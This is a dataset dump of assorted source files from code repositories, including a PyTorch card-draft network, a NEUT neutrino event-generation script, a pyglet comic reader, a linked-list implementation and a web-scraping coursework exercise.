max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
demae/dest/__init__.py | uiureo/demae | 6 | 12769651 | # flake8: noqa
from .s3_dest import S3Dest
| 0.921875 | 1 |
bots/draftsimtools/nnet_architecture.py | khakhalin/mtg | 14 | 12769652 | <reponame>khakhalin/mtg
# Torch imports
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data.dataset import Dataset
# Implements NN
class DraftNet(nn.Module):
def __init__(self, set_tensor, use_features = False):
"""Placeholder NN. Currently does nothing.
param ss: number of cards in set
param set_tensor: Mxss set tensor describing the set
"""
super(DraftNet, self).__init__()
# Specifies whether we train with features or not
self.use_features = use_features
# Load set tensor.
self.set_tensor = set_tensor
self.set_tensor_tranpose = torch.transpose(set_tensor, 0, 1)
self.M, self.ss = self.set_tensor.shape
self.half_ss = self.ss / 2
# Specify layer sizes.
size_in = self.ss
if use_features:
size_in = self.ss + self.M
size1 = self.ss
size2 = self.ss
size3 = self.ss
size4 = self.ss
size5 = self.ss
size6 = self.ss
size7 = self.ss
size8 = self.ss
self.ns = 0.01
self.bn = nn.BatchNorm1d(self.ss)
if use_features:
self.bn = nn.BatchNorm1d(self.ss + self.M)
self.linear1 = torch.nn.Linear(size_in, size1)
self.bn1 = nn.BatchNorm1d(size1)
self.relu1 = torch.nn.LeakyReLU(negative_slope = self.ns)
self.dropout1 = nn.Dropout(0.5)
self.linear2 = torch.nn.Linear(size1, size2)
self.bn2 = nn.BatchNorm1d(size2)
self.relu2 = torch.nn.LeakyReLU(negative_slope = self.ns)
self.dropout2 = nn.Dropout(0.5)
self.linear3 = torch.nn.Linear(size2, size3)
self.bn3 = nn.BatchNorm1d(size3)
self.relu3 = torch.nn.LeakyReLU(negative_slope = self.ns)
self.dropout3 = nn.Dropout(0.5)
self.linear4 = torch.nn.Linear(size3, size4)
self.relu4 = torch.nn.LeakyReLU(negative_slope = self.ns)
def forward(self, x):
collection = x[:, :self.ss]
pack = x[:, self.ss:]
# Get features from set tensor if specified
if self.use_features:
features = torch.mm(collection, self.set_tensor_tranpose)
collection_and_features = torch.cat((collection, features), 1)
collection_and_features = self.bn(collection_and_features)
collection = collection_and_features
y = self.linear1(collection)
y = self.bn1(y)
y = self.relu1(y)
y = self.dropout1(y)
y = self.linear2(y)
y = self.bn2(y)
y = self.relu2(y)
y = self.dropout2(y)
y = self.linear3(y)
y = self.bn3(y)
y = self.relu3(y)
y = self.dropout3(y)
y = self.linear4(y)
y = y * pack # Enforce cards in pack only.
return y
def __getitem__(self, index):
"""Return a training example.
"""
#Grab information on current draft.
pick_num = index % self.draft_size #0-self.pack_size*3-1
draft_num = int((index - pick_num)/self.draft_size)
#Generate.
x = self.create_new_x(pick_num, draft_num)
y = self.create_new_y(pick_num, draft_num)
return x, y
def create_new_x(self, pick_num, draft_num):
"""Generate x, input, as a row vector.
0:n : collection vector
x[i]=n -> collection has n copies of card i
n:2n : pack vector
0 -> card not in pack
1 -> card in pack
Efficiency optimization possible. Iterative adds to numpy array.
"""
#Initialize collection / cards in pack vector.
x = np.zeros([self.cards_in_set * 2], dtype = "int16")
#Fill in collection vector excluding current pick (first half).
for n in self.drafts_tensor[draft_num, :pick_num, 0]:
x[n] += 1
#Fill in pack vector.
cards_in_pack = self.pack_size - pick_num%self.pack_size #Cards in current pack.
for n in self.drafts_tensor[draft_num, pick_num, :cards_in_pack]:
x[n + self.cards_in_set] = 1
#Convert to Torch tensor.
x = torch.Tensor(x)
return x
def create_new_y(self, pick_num, draft_num, not_in_pack=0.5):
"""Generate y, a target pick row vector.
Picked card is assigned a value of 1.
Other cards are assigned a value of 0.
"""
#Initialize target vector.
#y = np.array([0] * self.cards_in_set)
y = np.zeros([self.cards_in_set], dtype = "int16")
#Add picked card.
y[self.drafts_tensor[draft_num, pick_num, 0]] = 1
#y = torch.Tensor(y, dtype=torch.int64) # Needed as target.
y = torch.tensor(y, dtype=torch.int64, device=device) # Needed as target.
return y
def __len__(self):
return len(self.drafts_tensor) * self.draft_size | 2.453125 | 2 |
src/vectorgen/run_genev.py | davehadley/hk-vectorgen | 0 | 12769653 | <filename>src/vectorgen/run_genev.py
import ROOT
import shutil
import tempfile
ROOT.PyConfig.IgnoreCommandLineOptions = True
import subprocess
import os
import glob
import argparse
import itertools
import collections
import runtime
#Jobs:
# (1) Merge flux files.
# (2) Create geometry.
# (3) Run event_rate.
# (4) Run genev.
###############################################################################
def _abspath(path):
f = os.path.expandvars(os.path.expanduser(path))
return os.path.abspath(f)
###############################################################################
class IJob(object):
def __init__(self, rundir=None, test=False):
self._test = test
if rundir is None:
rundir = RunDir()
self._rundir = rundir
def _tmp_chdir(self, workingdir, func, *args, **kwargs):
#keep original directory to change back to
origdir = os.getcwd()
#change directory
if workingdir is not None:
os.chdir(workingdir)
#actually run function
try:
ret = func(*args, **kwargs)
finally:
#change back to the original directory
if workingdir is not None:
os.chdir(origdir)
return ret
def _check_call(self, cmd, workingdir=None):
if workingdir is None:
workingdir = self._rundir.rundir()
ret = None
if self._test:
print "[TEST]",cmd
else:
ret = self._tmp_chdir(workingdir, subprocess.check_call, cmd, shell=True)
return ret
def verify(self):
return
def run(self):
return
###############################################################################
BeamPlane = collections.namedtuple("BeamPlane", ["name", "baseline", "ndcode"])
###############################################################################
def plane_from_ndid(ndid, context):
name = context.beamcontext.flux_planes().tostring(ndid)
baseline = context.beamcontext.flux_planes().baseline(ndid)
code = context.beamcontext.flux_planes().flukaid(ndid)
plane = BeamPlane(name=name, baseline=baseline, ndcode=code)
return plane
###############################################################################
class RunDir:
def __init__(self, path=None, card=None):
if path is None:
path = tempfile.mkdtemp(prefix="tmp_run_genev_")
self._rundir = _abspath(path)
self._card = self._find_card(card)
self._run_make_links()
def rundir(self):
return self._rundir
def _find_card(self, card):
if card is None:
#use default from NEUTGEOM directory
card = "".join((os.environ["NEUT_ROOT"], os.sep, "src/neutgeom/neut.card"))
card = _abspath(card)
if not os.path.exists(card):
raise Exception("Cannot find card file", card)
return card
def _run_make_links(self):
outdir = self.rundir()
try:
os.makedirs(outdir)
except os.error:
#ignore as this happens if directory already exists
pass
inputdir = "".join((os.environ["NEUT_ROOT"], os.sep, "src", os.sep, "neutsmpl"))
for fname in os.listdir(inputdir):
src = "".join((inputdir, os.sep, fname))
if os.path.islink(src):
dst = "".join((self.rundir(), os.sep, fname))
if not os.path.exists(dst):
os.symlink(src, dst)
src = self._card
dst = "".join((self.rundir(), os.sep, "neut.card"))
shutil.copyfile(src, dst)
return
###############################################################################
class MergeFluxJob(IJob):
def __init__(self, beam_input, rundir=None, test=False):
super(MergeFluxJob, self).__init__(rundir, test)
self._beam_input = beam_input
def run(self):
if not os.path.exists(self._beam_input.filename()):
self.verify()
self._run_hadd()
return
def verify(self):
self._beam_input.verify()
def _run_hadd(self):
cmd = " ".join(("hadd",
self._beam_input.filename(),
" ".join(self._beam_input.filelist()
)),
)
self._check_call(cmd)
###############################################################################
class MakeFluxLinks(IJob):
def __init__(self, beam_input, rundir=None, test=False, n=None):
super(MakeFluxLinks, self).__init__(rundir, test)
self._n = n
self._beam_input = beam_input
def run(self):
if not os.path.exists(self._beam_input.filename()):
self.verify()
self._run_make_links()
return
def verify(self):
self._beam_input.verify()
def _run_make_links(self):
outdir = "".join((self._rundir.rundir(), os.sep, self._beam_input.linkdir()))
try:
os.makedirs(outdir)
except os.error:
#ignore as this happens if directory already exists
pass
for i, fname in enumerate(self._beam_input.filelist()):
if self._n is not None and i >= self._n:
break
src = fname
dst = "".join((self._rundir.rundir(), os.sep, self._beam_input.filestem(), ".", str(i), ".root"))
if not os.path.exists(dst):
os.symlink(src, dst)
return
###############################################################################
class Orientation:
Z = "Z"
Y = "Y"
###############################################################################
class CylinderGeometry:
def __init__(self, ndid, radius=4.0, z=8.0, orientation=Orientation.Z, context=None):
if context is None:
context = runtime.getcontext()
self._context = context
self.ndid = ndid
self.radius = radius
self.z = z
self.orientation = orientation
self.name = self._uniquestr()
self._plane = plane_from_ndid(self.ndid, self._context)
def verify(self):
return
def _uniquestr(self):
return "_".join((self._context.beamcontext.flux_planes().tostring(self.ndid),
"cylinder",
self._float_to_string(self.radius, "r"),
self._float_to_string(self.z, "z"),
self.orientation,
))
def _float_to_string(self, f, prefix):
return prefix + str(int(round(f * 100.0)))
def filename(self):
return self.name + ".root"
def volume_name(self):
return "wc_volume"
def plane(self):
return self._plane
def build_detector_volume(self):
#get dimensions
m_to_mm = 1000.0
radius_mm = self.radius * m_to_mm
z_mm = self.z * m_to_mm / 2.0
#build volume
vol0 = ROOT.TGeoTube(0, radius_mm, z_mm);
vol1 = ROOT.TGeoTube(0, radius_mm, z_mm);
return (vol0, vol1)
###############################################################################
class CuboidGeometry:
def __init__(self, ndid, radius=4.0, z=8.0, orientation=Orientation.Z, context=None):
if context is None:
context = runtime.getcontext()
self._context = context
self.ndid = ndid
self.radius = radius
self.z = z
self.orientation = orientation
self.name = self._uniquestr()
self._plane = plane_from_ndid(self.ndid, self._context)
def verify(self):
return
def _uniquestr(self):
return "_".join((self._context.beamcontext.flux_planes().tostring(self.ndid),
"cuboid",
self._float_to_string(self.radius, "x"),
self._float_to_string(self.z, "z"),
self.orientation,
))
def _float_to_string(self, f, prefix):
return prefix + str(int(round(f * 100.0)))
def filename(self):
return self.name + ".root"
def volume_name(self):
return "wc_volume"
def plane(self):
return self._plane
def build_detector_volume(self):
#get dimensions
m_to_mm = 1000.0
radius_mm = self.radius * m_to_mm
z_mm = self.z * m_to_mm / 2.0
x_mm = radius_mm
y_mm = radius_mm
#build volume
vol0 = ROOT.TGeoBBox(x_mm, y_mm, z_mm);
vol1 = ROOT.TGeoBBox(x_mm, y_mm, z_mm);
return (vol0, vol1)
###############################################################################
class CreateGeometryJob(IJob):
def __init__(self, geometry, rundir=None, test=False):
super(CreateGeometryJob, self).__init__(rundir, test)
self._geometry = geometry
def run(self):
if not os.path.exists(self._geometry.filename()):
self.verify()
self._run_geometry()
return self._geometry.filename()
def verify(self):
self._geometry.verify()
return
def _run_geometry(self):
g = self._geometry
gen = GenWCGeom()
gen(g)
return
###############################################################################
class GenWCGeom:
#according to the manual ROOT geometry distance units are in cm.
#however looking at the existing nd280geometry.root, it appears to be in mm.
def __call__(self, geometry):
g = geometry
orientation = g.orientation
if not orientation == Orientation.Z:
raise Exception("not implemented")
outfilename = g.filename()
volume_name = g.volume_name()
#create geometry
wc_geometry = ROOT.TGeoManager("ND280Geometry","ND280Geometry");
oxygen = ROOT.TGeoElement("oxygen", "oxygen", 8, 16);
hydrogen = ROOT.TGeoElement("hydrogen", "hydrogen", 1, 1);
water = ROOT.TGeoMixture("water", 2, 1);
water.AddElement(oxygen, 1);
water.AddElement(hydrogen, 2);
water_med = ROOT.TGeoMedium("water", 1, water);
vol0, vol1 = g.build_detector_volume()
t2k = ROOT.TGeoVolume("t2k",vol1);
wc_volume = ROOT.TGeoVolume(volume_name, vol0, water_med);
t2k.AddNode(wc_volume, 1);
wc_geometry.AddVolume(t2k);
wc_geometry.SetTopVolume(t2k);
#write geometry to file
outfile = ROOT.TFile(outfilename, "RECREATE");
wc_geometry.Write()
# wc_geometry.Export(outfilename.replace(".root", ".gdml"))
outfile.Close()
return
###############################################################################
class EventRateJob(IJob):
def __init__(self, beam_input, geometry, rundir=None, test=False):
super(EventRateJob, self).__init__(rundir, test)
self._beam_input = beam_input
self._geometry = geometry
def filename(self):
beamname = self._beam_input.name
geomname = self._geometry.name
outfilename = "_".join(("eventrate",
beamname,
geomname,
)) + ".root"
return outfilename
def run(self):
outfilename = self.filename()
if not os.path.exists(outfilename):
self._create_event_rate()
return
def _create_event_rate(self):
outfilename = _abspath(self.filename())
beamfile = _abspath(self._beam_input.filename())
filestem = self._beam_input.filestem()
filestem = "".join((self._rundir.rundir(), os.sep, filestem))
#N = len(self._beam_input.filename()) - 1
N = len(glob.glob(filestem + "*.root")) - 1
if N <= 0:
raise Exception("No flux files matching", filestem)
geomfile = _abspath(self._geometry.filename())
volumename = self._geometry.volume_name()
plane = self._geometry.plane()
planenum = plane.ndcode
neutgeompath = os.environ["NEUTGEOM"]
cmd = " ".join((
os.sep.join((neutgeompath, "event_rate")),
#"-f", beamfile,
"-s", filestem, "0", str(N),
"-g",
geomfile,
"-v",
"+" + volumename,
"-o",
outfilename,
"-d",
str(planenum),
))
#setupneutcmd = "source /home/software/neut/setupNeut.sh" # TODO : move this to constants somewhere.
#cmd = " && ".join((setupneutcmd, cmd))
self._check_call(cmd)
return
def verify(self):
pass
###############################################################################
class GenEvConfig:
def __init__(self, num_events, nu_pdg):
self.num_events = num_events
if nu_pdg is None:
nu_pdg = 0
self.nu_pdg = nu_pdg
self._nu_pdg_names = {0 : "allnuflav",
12 : "nue",
14 : "numu",
-12 : "antinue",
-14 : "antinumu",
}
if (self.nu_pdg is not None) and (not self.nu_pdg in self._nu_pdg_names):
raise Exception("unknown neutrino PDG", self.nu_pdg)
@property
def name(self):
nupdgname = self._nu_pdg_names[self.nu_pdg]
return "_".join((str(self.num_events),
nupdgname,
))
###############################################################################
class GenEvJob(IJob):
def __init__(self, gen_config, beam_input, geometry, eventratejob, rundir=None, test=False):
super(GenEvJob, self).__init__(rundir, test)
self._gen_config = gen_config
self._beam_input = beam_input
self._geometry = geometry
self._eventrate = eventratejob
def filename(self):
beamname = self._beam_input.name
geomname = self._geometry.name
configname = self._gen_config.name
outfilename = "_".join(("genev",
beamname,
geomname,
configname,
)) + ".root"
return outfilename
def run(self):
outfilename = self.filename()
if not os.path.exists(outfilename):
self._create_genev()
return
#genev -j flux_files.root -g nd280geometry.root -v +Basket -o test.genev.output.2.root -n 10 -f rootracker -i setup_output.root -d 5 2>&1
def _create_genev(self):
outfilename = _abspath(self.filename())
beamfile = _abspath(self._beam_input.filename())
filestem = self._beam_input.filestem()
filestem = "".join((self._rundir.rundir(), os.sep, filestem))
#N = len(self._beam_input.filename()) - 1
N = len(glob.glob(filestem + "*.root")) - 1
if N <= 0:
raise Exception("No flux files matching", filestem)
geomfile = _abspath(self._geometry.filename())
eventratefile = _abspath(self._eventrate.filename())
volumename = self._geometry.volume_name()
plane = self._geometry.plane()
planenum = plane.ndcode
neutgeompath = os.environ["NEUTGEOM"]
numevents = self._gen_config.num_events
nupdg = self._gen_config.nu_pdg
cmd = " ".join((
os.sep.join((neutgeompath, "genev")),
#"-j", beamfile,
"-s", filestem, "0", str(N),
"-g",
geomfile,
"-v",
"+" + volumename,
"-o",
outfilename,
"-d",
str(planenum),
"-n",
str(numevents),
"-f rootracker",
#"-f neut",
"-i",
eventratefile,
"-w 1 ", #rewind the flux file
"-p",
str(nupdg),
))
#setupneutcmd = "source /home/software/neut/setupNeut.sh" # TODO : move this to constants somewhere.
#cmd = " && ".join((setupneutcmd, cmd))
self._check_call(cmd)
return
###############################################################################
class CompleteJob(IJob):
def __init__(self, beam_input, geometry, gen_config, rundir=None, test=False):
super(CompleteJob, self).__init__(rundir, test)
self._beam_input = beam_input
self._geometry = geometry
self._gen_config = gen_config
def run(self):
beam_input = self._beam_input
geometry = self._geometry
gen_config = self._gen_config
#job_flux = MergeFluxJob(beam_input, test=self._test)
rundir = self._rundir
job_flux = MakeFluxLinks(beam_input, test=self._test, rundir=rundir)
job_creategeometry = CreateGeometryJob(geometry, test=self._test, rundir=rundir)
job_evrate = EventRateJob(beam_input, geometry, test=self._test, rundir=rundir)
job_genev = GenEvJob(gen_config, beam_input, geometry, job_evrate, test=self._test, rundir=rundir)
jobs = [job_flux,
job_creategeometry,
job_evrate,
job_genev,
]
for j in jobs:
j.verify()
j.run()
return
###############################################################################
def str_from_polarity(polarity):
r = None
if polarity < 0:
r = "antinu"
else:
r = "nu"
return r
###############################################################################
def getjobname(opt):
return str_from_polarity(opt.polarity)
###############################################################################
def run(opt):
test = opt.test
card = opt.card
ndid = opt.flux
radius = opt.radius
polarity = opt.polarity
z = opt.z
nevents = opt.n
nu_pdg = opt.pdg
jobname = getjobname(opt)
#beamcontext = runtime.getcontext().beamcontext
#nu_flux_files = glob.glob(_abspath("~/t2k/data/irods/QMULZone2/home/hyperk/fluxes/fluka_flux/numode/*.root"))
#antinu_flux_files = glob.glob(_abspath("~/t2k/data/irods/QMULZone2/home/hyperk/fluxes/fluka_flux/anumode/*.root"))
nu_flux_files = glob.glob(_abspath("~/t2k/data/hk/ryan_flux/numode/*.root"))
antinu_flux_files = glob.glob(_abspath("~/t2k/data/hk/ryan_flux/antinumode/*.root"))
fluxplanes = runtime.FluxPlaneDefinitions()
fluxplanes.add(runtime.FluxPlane(name="nd2k", baseline=2.04, flukaid=1))
beamcontext = runtime.BeamContext(jnubeamfiles=runtime.JnuBeamFiles(nu_flux_files, antinu_flux_files), fluxplanes=fluxplanes)
context = runtime.Context(beamcontext=beamcontext)
jnubeamfiles = beamcontext.jnubeamfiles()
jnubeamfiles.verify()
if polarity == 1:
filelist = jnubeamfiles.nu_flux_files
elif polarity == -1:
filelist = jnubeamfiles.antinu_flux_files
else:
raise Exception()
#print "DEBUG speed up process for debugging"
#filelist = filelist[0:10]
rundir = RunDir(card=card)
beam_input = BeamInput(jobname, filelist)
#geometry = Geometry(ndid=self._context.DetectorId.ND280, radius=2.0, z=4.0, orientation=Orientation.Z)
if opt.geometry.lower() == "cylinder":
geometry = CylinderGeometry(ndid=ndid, radius=radius, z=z, orientation=Orientation.Z, context=context)
else:
geometry = CuboidGeometry(ndid=ndid, radius=radius, z=z, orientation=Orientation.Z, context=context)
gen_config = GenEvConfig(num_events=nevents, nu_pdg=nu_pdg)
job = CompleteJob(beam_input, geometry, gen_config, test=test, rundir=rundir)
job.run()
return
###############################################################################
def parsecml():
parser = argparse.ArgumentParser()
parser.add_argument("polarity", type=int, choices=[-1, 1], help="+1 to run neutrino, -1 to run anti-neutrino.", default=1)
parser.add_argument("radius", type=float, help="Set radius of cyclinder in m.")
parser.add_argument("z", type=float, help="Set z of cyclinder in m.")
parser.add_argument("flux", type=str, help="choose flux plane.")
parser.add_argument("--geometry", type=str, choices=["cylinder", "cuboid"], help="choose geoetry type", default="cuboid")
parser.add_argument("-c", "--card", type=str, default=None)
parser.add_argument("-n", "--nevents", dest="n", type=int, default=10000)
parser.add_argument("-p", "--pdg", dest="pdg", type=int, choices=[-14, -12, 12, 14], default=None)
parser.add_argument("-t", "--test", dest="test", type=bool, default=False)
return parser.parse_args()
def main():
opt = parsecml()
run(opt)
return
###############################################################################
if __name__ == "__main__":
main()
###############################################################################
| 2.203125 | 2 |
comics.py | wormsparty/python-comics-reader | 1 | 12769654 | <filename>comics.py
#!/usr/bin/env python3
#
# Copyright (C) 2012 <NAME> <wormsparty [at] gmail [dot] com>
#
# This program is a free software: you can redistribute it
# and/or modify it under the terms of the 'New BSD License'.
# See COPYING for more information.
#
import archive
import pyglet
import sys
import io
# We can specify any number of archives,
# read one after another
if len(sys.argv) == 1:
print("Usage: " + sys.argv[0] + " (archive)+")
sys.exit(1)
# We keep a list of sane files.
archives = []
for i in sys.argv[1:]:
try:
archive.Archive(i)
archives.append(i)
except archive.core.Error:
print(i + " doesn't seem to be an archive.")
# The current archive instance and archive number.
a = None
archive_index = 0
# Call to read the archive associated with 'idx'.
def load_archive(idx):
global a
global position
global archive_index
# By going back the program doesn't exit if it reached the end.
if idx < 0:
idx = 0
# Don't read futher than you can!
if idx >= len(archives):
print("Done :)")
sys.exit(0)
try:
a = iter(archive.Archive(archives[idx]))
except archive.core.Error:
# Shouldn't happen since we already checked the existence of
# the file. If this happens, at least don't crash!
load_archive(idx + 1)
if idx < archive_index:
# Here it's a bit hard, since we need to
# know how many entries there are. pyarchive
# doesn't look like it provised a 'len' field, so...
try:
while True:
a.__next__()
position += 1
except StopIteration:
position -= 2
# Go one step back...
try:
a = iter(archive.Archive(archives[idx]))
except archive.core.Error:
# Shouldn't happen.
# Go back to the one that didn't fail.
load_archive(idx + 1)
for x in range(0, position):
a.__next__()
else:
position = 0
archive_index = idx
# Load the first archive.
load_archive(0)
# Initialize graphics
window = pyglet.window.Window(fullscreen=True)
img = None
def load_image(buff, filename):
global img
# Since the images are taller than large, we need to rotate them
# by 90 degrees to be visible on monitors, which are wider than tall.
f = io.BytesIO(buff)
img = pyglet.sprite.Sprite(pyglet.image.load(filename, file=f))
img.scale = float(window.height) / float(img.image.width)
img.set_position(img.image.height * img.scale, 0)
img.rotation = -90.0
def load_next_image():
global a
global position
try:
element = a.__next__()
position += 1
except StopIteration:
load_archive(archive_index + 1)
load_next_image()
return
buff = element.read()
if len(buff) > 0:
load_image(buff, element.filename)
else:
load_next_image()
def load_prev_image():
global a
global position
global idx
if position <= 1:
load_archive(archive_index - 1)
load_next_image()
else:
position -= 1
try:
a = iter(archive.Archive(archives[archive_index]))
except archive.core.Error:
# This is really bad :/
# Skip to next archive.
load_archive(archive_index + 1)
element = a.__next__()
for i in range(1, position):
element = a.__next__()
buff = element.read()
if len(buff) > 0:
load_image(buff, element.filename)
else:
load_prev_image()
# Load the first image of the archive.
load_next_image()
# The callbacks we need for pyglet.
@window.event
def on_draw():
window.clear()
if img is not None:
img.draw()
@window.event
def on_key_press(symbol, modifiers):
# 'q' or escape exit.
if symbol == pyglet.window.key.Q or symbol == pyglet.window.key.ESCAPE:
sys.exit(0)
# Left gets the previous image.
elif symbol == pyglet.window.key.LEFT:
load_prev_image()
# All other keys go to the next image.
else:
load_next_image()
# Go!
pyglet.app.run()
| 2.953125 | 3 |
stack/doubly_linked_list.py | Oyekunle-Mark/tangled-mystery | 0 | 12769655 | <gh_stars>0
from typing import TypeVar, Generic, Optional, Any, Union
T = TypeVar('T')
class ListNode(Generic[T]):
"""Each ListNode holds a reference to its previous node
as well as its next node in the List."""
def __init__(self, value: T, prev: Optional[Any] = None, next: Optional[Any] = None) -> None:
self.value = value
self.prev = prev
self.next = next
"""Wrap the given value in a ListNode and insert it
after this node. Note that this node could already
have a next node it is point to."""
def insert_after(self, value: T) -> None:
current_next = self.next
self.next = ListNode(value, self, current_next)
if current_next:
current_next.prev = self.next
"""Wrap the given value in a ListNode and insert it
before this node. Note that this node could already
have a previous node it is point to."""
def insert_before(self, value: T) -> None:
current_prev = self.prev
self.prev = ListNode(value, current_prev, self)
if current_prev:
current_prev.next = self.prev
"""Rearranges this ListNode's previous and next pointers
accordingly, effectively deleting this ListNode."""
def delete(self) -> None:
if self.prev:
self.prev.next = self.next
if self.next:
self.next.prev = self.prev
"""Our doubly-linked list class. It holds references to
the list's head and tail nodes."""
class DoublyLinkedList(Generic[T]):
def __init__(self, node: Optional[ListNode] = None):
self.head = node
self.tail = node
self.length = 1 if node is not None else 0
def __len__(self) -> int:
return self.length
"""Wraps the given value in a ListNode and inserts it
as the new head of the list. Don't forget to handle
the old head node's previous pointer accordingly."""
def add_to_head(self, value: T) -> None:
new_node = ListNode(value)
if not self.head and not self.tail:
self.head = self.tail = new_node
else:
new_node.next = self.head
self.head.prev = new_node
self.head = new_node
self.length += 1
"""Removes the List's current head node, making the
current head's next node the new head of the List.
Returns the value of the removed Node."""
def remove_from_head(self) -> T:
if not self.head and not self.tail:
return
removed_node_value = self.head.value
if self.head is self.tail:
self.head = self.tail = None
else:
removed_node = self.head
self.head = self.head.next
removed_node.delete()
self.length -= 1
return removed_node_value
"""Wraps the given value in a ListNode and inserts it
as the new tail of the list. Don't forget to handle
the old tail node's next pointer accordingly."""
def add_to_tail(self, value: T) -> None:
new_node = ListNode(value)
if not self.head and not self.tail:
self.head = self.tail = new_node
else:
new_node.prev = self.tail
self.tail.next = new_node
self.tail = new_node
self.length += 1
"""Removes the List's current tail node, making the
current tail's previous node the new tail of the List.
Returns the value of the removed Node."""
def remove_from_tail(self) -> T:
if not self.head and not self.tail:
return
removed_node_value = self.tail.value
if self.head is self.tail:
self.head = self.tail = None
else:
removed_node = self.tail
self.tail = self.tail.prev
removed_node.delete()
self.length -= 1
return removed_node_value
"""Removes the input node from its current spot in the
List and inserts it as the new head node of the List."""
def move_to_front(self, node: ListNode) -> None:
if node == self.head:
return
node_value = node.value
if node is self.tail:
self.remove_from_tail()
else:
node.delete()
self.length -= 1
self.add_to_head(node_value)
"""Removes the input node from its current spot in the
List and inserts it as the new tail node of the List."""
def move_to_end(self, node: ListNode) -> None:
if node is self.tail:
return
node_value = node.value
if node is self.head:
self.remove_from_head()
else:
node.delete()
self.length -= 1
self.add_to_tail(node_value)
"""Removes a node from the list and handles cases where
the node was the head or the tail"""
def delete(self, node: ListNode) -> None:
if node is self.head:
self.remove_from_head()
elif node is self.tail:
self.remove_from_tail()
else:
node.delete()
self.length -= 1
"""Returns the highest value currently in the list"""
def get_max(self) -> Union[None, T]:
if not self.head:
return None
current_max_value = self.head.value
current_node = self.head
while current_node:
if current_node.value > current_max_value:
current_max_value = current_node.value
current_node = current_node.next
return current_max_value
| 3.609375 | 4 |
py4e103/w4.e12.graded2.py | markhorsfield/py4e101 | 0 | 12769656 | <reponame>markhorsfield/py4e101<gh_stars>0
#!/usr/bin/python3
# In this assignment you will write a Python program that
# expands on https://www.py4e.com/code3/urllinks.py.
#
# The program will use urllib to read the HTML from the data files below,
# extract the href= values from the anchor tags,
# scan for a tag that is in a particular position from the top
# and follow that link, repeat the process a number of times,
# and report the last name you find.
import urllib.request, urllib.parse, urllib.error
from bs4 import BeautifulSoup
import ssl
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
# test
# Sequence of names: <NAME>
#url = 'http://py4e-data.dr-chuck.net/known_by_Fikret.html'
#repeat = 4
#position = 3
url = 'http://py4e-data.dr-chuck.net/known_by_Jensyn.html'
repeat = 7
position = 18
# repeat 7 times
for i in range(repeat) :
html = urllib.request.urlopen(url, context=ctx).read()
soup = BeautifulSoup(html, "html.parser")
# Retrieve all of the anchor tags
tags = soup('a')
count = 0
for tag in tags:
count += 1
# stop at position
if count > position :
break
url = tag.get('href', None)
#print('Name:', tag.contents[0])
name = tag.contents[0]
print(name)
| 3.953125 | 4 |
jobcrawler/core/email/address.py | amakus/JobCrawler | 0 | 12769657 | class EmailAddress:
def __init__(self, email):
self.email = email
self._email_tpl = tuple(self._email.split('@'))
def __str__(self):
return self.email
def __repr__(self):
return f"{EmailAddress.__name__}('{self.email}')"
@property
def email(self):
return self._email
@email.setter
def email(self, email):
self._email = str(email)
if not self._is_valid():
raise ValueError(f'{self.email} is not a valid email address')
@property
def user(self):
return self._email_tpl[0]
@property
def domain(self):
return self._email_tpl[1]
def _is_valid(self):
email_split = self._email.split('@')
if len(email_split) != 2:
return False
domain_split = email_split[1].split('.')
if len(domain_split) < 2:
return False
return True
| 3.46875 | 3 |
plaster/run/lnfit/lnfit_params.py | zack-erisyon/plaster_v1 | 0 | 12769658 | <reponame>zack-erisyon/plaster_v1<filename>plaster/run/lnfit/lnfit_params.py<gh_stars>0
from munch import Munch
from plaster.tools.schema.schema import Schema as s, Params
class LNFitParams(Params):
defaults = Munch(photometry_only=False)
schema = s(
s.is_kws_r(
dye_on_threshold=s.is_int(),
photometry_only=s.is_bool(),
lognormal_fitter_v2_params=s.is_str(),
)
)
| 1.804688 | 2 |
python/osr/osr_getprojectionmethods_test.py | schwehr/gdal-autotest2 | 0 | 12769659 | <reponame>schwehr/gdal-autotest2
#!/usr/bin/env python
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This is a complete rewrite of a file licensed as follows:
#
# Copyright (c) 2009, <NAME> <even dot rouault at mines dash paris dot org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
"""Test of get projection methods.
Rewrite of
http://trac.osgeo.org/gdal/browser/trunk/autotest/osr/osr_getprojectionmethods.py
"""
import unittest
from osgeo import osr
import unittest
class OsrGetProjectionMethods(unittest.TestCase):
def testGetProj01TransverseMercator(self):
methods = osr.GetProjectionMethods()
method_names = [method[0] for method in methods]
# Random sampling of what is available.
self.assertIn('Transverse_Mercator', method_names)
self.assertIn('Azimuthal_Equidistant', method_names)
self.assertIn('Eckert_VI', method_names)
self.assertIn('Oblique_Stereographic', method_names)
self.assertIn('Orthographic', method_names)
if __name__ == '__main__':
unittest.main()
| 1.703125 | 2 |
nith_results/__init__.py | sauravchandra1/Nith_results | 63 | 12769660 | __version__ = '0.0.1'
